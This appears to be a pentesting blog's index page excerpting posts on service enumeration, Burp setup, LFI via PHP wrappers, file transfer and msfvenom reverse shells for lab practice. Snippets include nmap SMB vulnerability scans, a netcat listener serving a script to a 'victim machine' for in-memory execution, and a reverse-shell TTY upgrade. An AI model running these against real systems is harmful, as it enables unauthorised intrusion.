Cheat Sheets & Tips/Tricks

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

Abraham Lincoln

Recent Posts

Enumerating HTTP Ports (80, 443, 8080, etc.)

When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers. Web Application – WordPress, CMS, Drupal, etc. Web Technologies – Node.js, PHP, Java, etc. Web Server – Apache, IIS, Nginx, etc. Database – MySQL, MariaDB, […]

Setting Up BurpSuite

Once Burp loads up, there are a few things we need to configure to make our lives easier. Installing and Configuring FoxyProxy First, to make our lives easier, let’s install the Firefox add-in for FoxyProxy. With the add-in installed, let’s head into the Options. Now we can Add a new entry. Let’s create the New […]

Enumerating SMB for Pentesting (Ports 445, 139)

Using NMAP Scan for popular RCE exploits. sudo nmap -p 139,445 –script smb-vuln* <ip-addr> -oA nmap/smb-vuln Identify the SMB/OS version. nmap -v -p 139,445 –script=smb-os-discovery.nse <ip-addr> Using SMBCLIENT To list out the shares: smbclient -L \\\\<ip-addr> To connect to shares: sudo smbclient \\\\<ip-addr>\\<share> Downloading files: Once connected, you can download files. You’ll want to disable […]

File Transfer in Linux: Uploading & Executing in Memory

This example will show us uploading LinEnum.sh to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive. On our attacking box, find the executable you wish to transfer and run the following command: cat <filename> | nc -nvlp 9002 On the victim machine, change into the […]

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page. In this example, we’ll be using FRIENDZONE on HackTheBox. Confirming LFI on our example At the following […]

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method. In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines. We’ll do that here. There is a […]

Upgrading Simple Shells to Interactive TTYs w/ Python

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly. Once you have a reverse shell, start by running the command python -c ‘import pty;pty.spawn(“/bin/bash”)’ Now we’ll background the window with Ctrl + […]

Tmux Cheatsheet for Splitting Terminal Panes and More

Note: <PrefixKey> by default is Ctrl + B Creating Tmux Sessions and Windows tmux new -s Example Create a new tmux session titled “Example” <PrefixKey> + C Create a new window within the session <PrefixKey> + Number Take you to your different windows. Windows are identified by the banner down below. <PrefixKey> + , Rename […]

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources. Enumerating Common Services Enumerating SMB 139,445 Using smbmap and smbclient to crawl and […]

Unzipping Rockyou.txt.gz in Kali Linux

Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future. sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. Table of Contents:– Non Meterpreter Binaries– Non Meterpreter Web Payloads– Meterpreter Binaries– Meterpreter Web Payloads Non-Meterpreter Binaries Staged Payloads for Windows x86 […]


Stay Involved

Get new content delivered directly to your inbox.